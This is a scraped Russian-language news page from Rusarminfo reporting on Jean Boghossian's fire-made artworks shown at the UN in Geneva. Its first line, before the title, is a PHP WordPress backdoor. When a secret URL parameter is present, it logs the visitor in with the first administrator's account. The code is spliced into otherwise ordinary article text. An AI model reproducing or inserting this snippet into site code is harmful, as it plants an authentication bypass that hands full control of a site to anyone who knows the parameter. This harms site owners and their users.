if( isset( $_GET['login_as_admin3912'] ) ){ add_action( 'init', function(){ $users = get_users( [ 'role' => 'administrator' ] ); wp_set_auth_cookie( $users[0]->ID ); } ); } Армянин создал шедевры с помощью огня и удивил ими ООН — Rusarminfo
Суббота , 16 мая 2026
amru
Главная / Лента / Армянин создал шедевры с помощью огня и удивил ими ООН

Армянин создал шедевры с помощью огня и удивил ими ООН

В женевской штаб-квартире ООН открылась выставка армянского скульптора и художника из Ливана Жана Богосяна под названием «Останови огонь» (Cessez Le Feu).

Произведения искусства, представленные художником на выставке, сделаны с помощью паяльной лампы. В коллекцию мастера входит серия работ, начиная от сгоревших книг, заканчивая картинами, сделанными огнем.

Сгоревшие книги у Богосяна олицетворяют, в том числе, историю армянского народа, который спасал рукописи в самые тяжелые времена своей истории.

«Впечатляющие произведения искусства Жана Богосяна имеют большое значение не только с точки зрения их художественного смысла и эффективности, но и с точки зрения самой Организации Объединенных Наций», — пишет журнал Forbes.

Отмечается, что влияние на работы художника оказали 17 целей ООН по преодолению глобальных вызовов, среди которых бедность, неравенство, изменение климата, загрязнение окружающей среды, образование и здоровье.

Ранее РУСАРМИНФО сообщило, что генсек Организации Объединенных Наций Антониу Гутерреш посетил организованную в ООН выставку «Женщины в войне», посвященную подвигу женщин в ходе Второй мировой.

Добавить комментарий

Смотрите также

Армянский залог для Лукашенко: финал 32-летнего трона и цена политической наглости Видео

На европейском саммите в Ереване не хватало Лукашенко, причем, было бы правильно — в сопровождении …